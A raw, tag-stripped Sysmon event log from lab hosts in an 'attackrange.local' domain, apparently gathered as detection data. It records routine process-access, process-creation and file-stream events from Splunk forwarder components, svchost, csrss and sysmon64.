16:31:23.780{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-525B-6063-3101-00000000AF01}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061450Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.780{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-525B-6063-3101-00000000AF01}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061449Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.782{7F8C56E7-525B-6063-3101-00000000AF01}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061448Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.592{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D400-00000000AF01}3720C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061447Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:23.108{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E656CEB33D6592580915C5B63D2F3724,SHA256=E32783EBFC9F009EBE72C8F2188DF62CF8E2C1896D1BD96A06219DF0955B8E46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246242Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.660{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A800F43ED30007848A180F47A784E3,SHA256=125CFF53C5E5FA355D0F376CD1CDF07E7CF533DDF7488EA856AEFFA48D2C9A7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246241Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.472{CB4067E1-525B-6063-C322-00000000AF01}35403436C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246240Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-525B-6063-C322-00000000AF01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246239Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246238Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246237Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246236Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246235Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246234Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246233Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246232Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246231Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246230Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-525B-6063-C322-00000000AF01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246229Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.363{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-525B-6063-C322-00000000AF01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246228Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.364{CB4067E1-525B-6063-C322-00000000AF01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246227Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:23.175{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4EE462EA67B45D587768F57965D551D,SHA256=41B56C658B9A6EF50D3D5F153422AD7E1BED3A71A462A62FB6DD0A32ECD3F78C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061467Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.605{7F8C56E7-525C-6063-3201-00000000AF01}22645152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061466Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44FB83E854BD8FFBD64EED424DD827C,SHA256=53856AE11302C587CC1BF8205CC9BEA0FD3112A63364E0ED06E4050332FBA1A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061465Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-525C-6063-3201-00000000AF01}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061464Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061463Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061462Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061461Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061460Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-525C-6063-3201-00000000AF01}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061459Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:24.480{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-525C-6063-3201-00000000AF01}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 